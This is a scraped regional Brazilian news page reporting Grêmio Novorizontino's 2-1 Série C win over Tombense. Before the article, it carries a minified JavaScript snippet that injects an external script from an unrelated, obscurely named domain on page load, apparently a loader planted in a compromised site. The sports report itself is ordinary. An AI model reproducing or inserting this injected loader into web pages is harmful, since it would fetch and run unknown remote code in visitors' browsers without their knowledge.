;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Grêmio Novorizontino marca nos acréscimos, bate Tombense em Tombos por 2 a 1 e vira líder da Série C. - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Grêmio Novorizontino marca nos acréscimos, bate Tombense em Tombos por 2 a 1 e vira líder da Série C.

Nesta segunda-feira, o Grêmio Novorizontino venceu o Tombense, em Tombos, por 2 a 1. A partida foi válida pela 3ª rodada da fase decisiva da Série C.

O jogo foi disputado no Estádio Almeidão contou com gol de Cléo Silva, para os visitantes, aos 32 minutos do primeiro tempo.

Aos 29 da segunda etapa, David deixou tudo igual. Já aos 48 minutos, Cléo Silva balançou as redes mais uma vez e garantiu a vitória do time  paulistas.

Com o resultado, o Novorizontino vira o líder do Grupo D e soma seis pontos. Já o Tombense estaciona na tabela com quatro pontos ganhos, e ocupa a 3ª posição.

O Tombense volta a campo no domingo, às 16h00 (de Brasília), quando encara novamente o Novorizontino, na abertura do segundo turno do quadrangular final, desta vez, o jogo será disputado no interior paulista.

Para o Time Mineiro, só a vitória interessa.

Fonte: João Santana